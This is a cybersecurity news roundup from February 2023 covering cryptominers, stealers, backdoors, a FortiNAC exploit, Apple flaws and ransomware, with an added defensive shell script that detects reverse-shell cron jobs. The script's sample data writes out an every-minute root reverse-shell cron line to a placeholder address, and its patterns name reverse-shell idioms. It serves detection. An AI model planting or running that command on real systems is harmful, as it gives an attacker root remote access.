SAN MATEO, CA, February 27, 2023 — Cybersecurity news weekly roundup. Stories, news, politics, and events that impacted the network security industry last week. Brought to you by NetworkTigers.
- Mining malware delivered via pirated copies of Apple’s Final Cut Pro
- S1deload Stealer takes over Facebook and YouTube accounts, mines for crypto
- Lazarus Group believed to be using new WinorDLL64 backdoor
- Hackers are mimicking ChatGPT to spread credential stealing Fobo trojan
- Fortinet FortiNAC exploit created, users urged to upgrade ASAP
- Apple reports three new iPhone, iPad and Mac OS vulnerabilities
- HardBit ransomware demands insurance details to determine ransom price
- MyloBot botnet spreading to more than 50,000 devices by the day
- Earth Kitsune espionage group deploys new WhiskerSpy backdoor
Mining malware delivered via pirated copies of Apple’s Final Cut Pro
Torrented versions of Apple’s Final Cut Pro video editing software have been found to carry the XMRig cryptocurrency miner. Researchers have determined that the bundled miner is an upgraded build with features that make it especially hard to detect, such as routing its traffic over the Invisible Internet Project (I2P) network. “I2P is a private network layer that offers users a similar kind of anonymity as that offered by The Onion Router (Tor) network.” The uploader of the weaponized copy has a history of distributing pirated Apple applications carrying the same cryptominer. Read more.
S1deload Stealer takes over Facebook and YouTube accounts, mines for crypto
S1deload Stealer is a new malware that hijacks victims’ Facebook or YouTube accounts after they click a malicious link that leads to an executable file. Once installed, the malware can perform several functions. Aside from exfiltrating login credentials, S1deload Stealer can mine the BEAM cryptocurrency or artificially boost the victim’s post count. It also checks whether the victim is an admin of a Facebook page or group, which can then be used as a platform to spam further links and ensnare more victims. Read more.
Lazarus Group believed to be using new WinorDLL64 backdoor
Researchers believe that North Korean hacking collective Lazarus Group is exfiltrating data from victims using WinorDLL64, “a fully-featured implant that can exfiltrate, overwrite, and delete files; execute PowerShell commands; and obtain comprehensive information about the underlying machine.” Targeting so far has been highly selective, with WinorDLL64 used against victims in North America, the Middle East and Central Europe. Lazarus is implicated because the new malware’s code and behavior overlap with the group’s previous tools. Read more.
Hackers are mimicking ChatGPT to spread credential stealing Fobo trojan
ChatGPT’s popularity has brought scam attempts with it. Criminals are using social media accounts to create fake content that purports to come either from ChatGPT’s developers or from communities of fans of the AI chatbot. Posts feature content about ChatGPT and include a link that leads victims to a convincingly crafted fraudulent landing page, where a click on the “download” button installs a trojan that harvests social media and email login credentials. Read more.
Fortinet FortiNAC exploit created, users urged to upgrade ASAP
Horizon3 security researchers have published a proof-of-concept exploit for CVE-2022-39952, a vulnerability in Fortinet’s FortiNAC that allows unauthenticated remote code execution. The proof of concept works by writing “a cron job to /etc/cron.d/ that triggers every minute to initiate a root reverse shell to the attacker.” The code is available on GitHub, where it can be weaponized by threat actors or used by administrators to test and improve their defenses. FortiNAC users are urged to upgrade to a version that is not affected: 9.4.1, 9.2.6, 9.1.8 or 7.2.0 and later releases of each branch. Read more.
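As an added example (not code from the article, from Horizon3 or from Fortinet), the following POSIX shell check looks for the persistence artifact the proof of concept leaves behind: a file in a cron.d directory with an every-minute schedule whose command looks like a reverse shell. The sample cron files, the 192.0.2.10:4444 address and the command patterns are constructed for illustration; a real hunt would extend the pattern list and run it against /etc/cron.d on the appliance.

```shell
#!/bin/sh
# Added example: flag every-minute cron.d jobs that look like reverse shells,
# the persistence pattern Horizon3 describes for CVE-2022-39952.
# Not part of the original article or the Horizon3 proof of concept.

# Print the path of each file in a cron.d-style directory that contains a
# "* * * * *" job (five wildcard schedule fields, then a user, then a command)
# whose command uses a common reverse-shell idiom: a /dev/tcp/ redirect,
# "nc ... -e", or an interactive "sh -i"/"bash -i".
# Argument: directory to scan (defaults to /etc/cron.d).
scan_cron_dir() {
    dir="${1:-/etc/cron.d}"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if grep -Eq '^\*([[:space:]]+\*){4}[[:space:]]+[A-Za-z0-9_-]+[[:space:]]+.*(/dev/tcp/|nc[[:space:]]+.*-e[[:space:]]|(ba)?sh[[:space:]]+-i)' "$f"; then
            echo "$f"
        fi
    done
}

# Constructed sample directory (not files recovered from any incident):
# one benign nightly logrotate job and one every-minute root reverse shell
# to an example address, written in the shape the proof of concept uses.
make_sample_cron_dir() {
    d=$(mktemp -d)
    printf '0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n' > "$d/logrotate"
    printf '* * * * * root bash -c "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"\n' > "$d/payload"
    echo "$d"
}

# Stand-alone run: build the sample, report what the scan flags, clean up.
# Expected output: only the "payload" file is listed.
sample=$(make_sample_cron_dir)
scan_cron_dir "$sample"
rm -rf "$sample"
```

Run it as `sh scan_cron.sh` to see the sample result, or call `scan_cron_dir /etc/cron.d` on a live host. Matching only the five-wildcard schedule keeps benign scheduled jobs out of the report; a lower-noise alternative on a hardened appliance is to treat any new file under /etc/cron.d as suspicious and review it by hand.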
Apple reports three new iPhone, iPad and Mac OS vulnerabilities
Apple has added three vulnerabilities affecting macOS, iOS and iPadOS to the security advisory it published last month. Exploited successfully, they could allow an attacker to install applications on the compromised device or erase its content. One flaw is a “race condition in the Crash Reporter component (CVE-2023-23520) that could enable a malicious actor to read arbitrary files as root.” The other two (CVE-2023-23530 and CVE-2023-23531) are in the Foundation framework. All three are patched in the latest OS versions, and Apple users are urged to update immediately. Read more.
HardBit ransomware demands insurance details to determine ransom price
Operators of HardBit ransomware are taking a novel approach to ransom negotiations: demanding victims’ cyber insurance details so they can set a payment the insurer will cover. Framing insurers as the real villain, HardBit tells victims that insurance providers do not negotiate on their behalf and that disclosing the policy details is the only way to get their files back. HardBit encrypts data quickly and makes recovery harder than usual: it copies itself to the Windows Startup folder for persistence, disables Windows Defender features, and overwrites each file’s contents in place with encrypted data rather than writing an encrypted copy and deleting the original. Read more.
MyloBot botnet spreading to more than 50,000 devices by the day
Devices in the US, India, Iran and Indonesia are falling victim to the MyloBot botnet at a rate of over 50,000 machines a day, according to researchers at BitSight. MyloBot is hard to spot because it stays dormant for 14 days after infection before contacting its command-and-control server. Once active it can download and execute any payload, so an attacker can deploy whatever malware they choose. In 2022, for example, MyloBot was observed sending extortion emails from compromised endpoints. Read more.
Earth Kitsune espionage group deploys new WhiskerSpy backdoor
Cyber espionage group Earth Kitsune has been observed running a social engineering campaign that delivers a new backdoor called WhiskerSpy. Earth Kitsune lures users to compromised pro-North Korea websites, but the backdoor is only delivered to visitors whose IP addresses fall within specific regions of Japan, Brazil and China. Another unusual characteristic of the campaign is that it targets individuals rather than companies or organizations. Read more.